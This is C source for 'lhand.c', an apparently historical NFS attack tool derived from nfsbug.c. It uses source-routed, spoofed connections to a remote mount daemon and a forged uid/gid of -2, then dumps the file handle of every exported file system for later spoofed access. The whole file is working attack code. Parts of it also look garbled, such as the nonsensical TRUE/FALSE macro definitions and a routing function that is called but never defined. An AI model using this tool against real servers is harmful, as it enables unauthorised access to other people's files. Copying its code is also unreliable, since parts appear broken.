/*
 * lhand.c
 *
 * Will list all exportable file system file handles for use with
 * source routed spoofed connections.  This is based upon nfsbug.c
 * written by Leendert.
 */
#include <stdio.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <sys/vfs.h>
#include <sys/socket.h>
#include <errno.h>
#include <sys/filio.h>

#ifdef SVR4
#include <rpc/clnt_soc.h>
#endif

#include "mount.h"
#include "nfs_prot.h"

#ifndef TRUE
#define	TRUE	'\'\'\'
#define	FALSE	'-'-'-'
#endif

#ifdef SVR4
#define bzero(s,n)      memset((s), 0, (n))
#define bcopy(a,b,c)    memcpy(b,a,c)
#endif

/*
 * This struct is only used to find the size of the data field in the
 * fhandle structure below.
 */
struct fhsize {
    fsid_t  f1;
    u_short f2;
    char    f3[4];
    u_short f4;
    char    f5[4];
};
#define NFS_FHMAXDATA   ((NFS_FHSIZE - sizeof (struct fhsize) + 8) / 2)

struct svcfh {
    fsid_t  fh_fsid;                /* filesystem id */
    u_short fh_len;                 /* file number length */
    char    fh_data[NFS_FHMAXDATA]; /* and data */
    u_short fh_xlen;                /* export file number length */
    char    fh_xdata[NFS_FHMAXDATA]; /* and data */
};

struct timeval timeout = {30, 0};

AUTH *create_unix_auth();

main(argc, argv)
    int argc;
    char **argv;
{
    int i;
    struct sockaddr_in server_addr, addr;
    CLIENT *mntclient;		/*  mountd client          */
    fhstatus *mountpoint;	/*  handle control struct  */
    exports ex, *exp;
    int sock;
    char *host;
    char *p;

    char route[128];		/*  route data             */
    int hops;	     		/*  number of hops         */

    if (argc<2 || argc>3) {
        fprintf (stderr, "Usage: %s <hostname> [<mountd_port>]\n", argv[0]);
        exit (1);
    }
    host=argv[1];

    /*
     * Resolve the route
     */
    hops=build_route(host, &server_addr, &route);

    if (argc==3)
        server_addr.sin_port = atoi(argv[2]);
    else
        server_addr.sin_port = 0;

    /*
     * Talk to the remote mount deamon.  Since
     * TCP is the only useful protocol, blow up
     * on anything else.
     */
    sock = RPC_ANYSOCK;
    addr = server_addr;

    if ((mntclient = clntstcp_create(&addr, MOUNTPROG, MOUNTVERS,
    &sock, 0, 0, &route, hops)) == (CLIENT *)0) {
        fprintf(stderr, "%s: %s: Could not find TCP path to mount\n", argv[0], host);
        exit(1);
    } 

    clnt_control(mntclient, CLSET_TIMEOUT, &timeout);
    mntclient->cl_auth = create_unix_auth(0, 0);
    if (mntclient->cl_auth == NULL) {
	clnt_destroy(mntclient);
	return;
    }
    mntclient->cl_auth = create_unix_auth(-2, -2); /* well known uid, gid */
    if (mntclient->cl_auth == NULL) {
	clnt_destroy(mntclient);
	return;
    }

    printf("Connected to NFS mount daemon at %s (%s) using transport (TCP/IP)\n",
        host, inet_ntoa(server_addr.sin_addr));

    /*
     * Get the NFS export list. From this we extract the file systems
     * we try to mount.
     */
    if ((exp = mountproc_export_1(NULL, mntclient)) == NULL) {
	clnt_perror(mntclient, "mountproc_export");
	clnt_destroy(mntclient);
	return;
    }

    /*
     * print the handle of every 
     * remote mountable file system.
     */
    for (ex = *exp; ex != NULL; ex = ex->ex_next) {
	mountpoint = mountproc_mnt_1(&ex->ex_dir, mntclient);
	if (mountpoint && mountpoint->fhs_status == NFS_OK) {
            printf("%s:%s\n", host, ex->ex_dir);
	    printf("<");
	    for (i=0, p = (char *)mountpoint->fhstatus_u.fhs_fhandle;
                 i < sizeof(struct svcfh); i++, p++)
		printf(" %02x", *p & 0xFF);
	    printf(" >\n\n");
        } else
        printf ("%s:%s could not be mounted.\n", host, ex->ex_dir);
    }

    auth_destroy(mntclient->cl_auth);
    clnt_destroy(mntclient);
}

/*
 * Returns an auth handle with parameters determined by doing lots of
 * syscalls.
 */
AUTH *
create_unix_auth(uid, gid)
    int uid, gid;
{
    char machname[MAX_MACHINE_NAME + 1];
    int gids[1];

    if (gethostname(machname, MAX_MACHINE_NAME) == -1) {
	fprintf(stderr, "create_unix_auth: cannot get hostname\n");
	return NULL;
    }
    machname[MAX_MACHINE_NAME] = 0;
    gids[0] = gid;
    return authunix_create(machname, uid, gid, 1, gids);
}

/*
 * Acquire a privileged port when possible
 */
int
privileged()
{
    int lport = IPPORT_RESERVED - 1;
    struct sockaddr_in sin;
    int s, dontblock = 1;

    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = 0;
    s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if (s < 0)
	return RPC_ANYSOCK;
    for (;;) {
	sin.sin_port = htons((u_short)lport);
#ifdef SVR4
	if (bind(s, (caddr_t)&sin, sizeof (sin)) >= 0) {
#else
	if (bind(s, (caddr_t)&sin, sizeof (sin), 0) >= 0) {
#endif
	    (void)ioctl(s, FIONBIO, (char *) &dontblock);
	    printf("Using a privileged port (%d)\n", lport);
	    fflush(stdout);
	    return s;
	}
	if (errno != EADDRINUSE && errno != EADDRNOTAVAIL)
	    return RPC_ANYSOCK;
	(lport)--;
	if (lport == IPPORT_RESERVED/2) {
	    fprintf(stderr, "privileged socket: All ports in use\n");
	    return RPC_ANYSOCK;
	}
    }
}
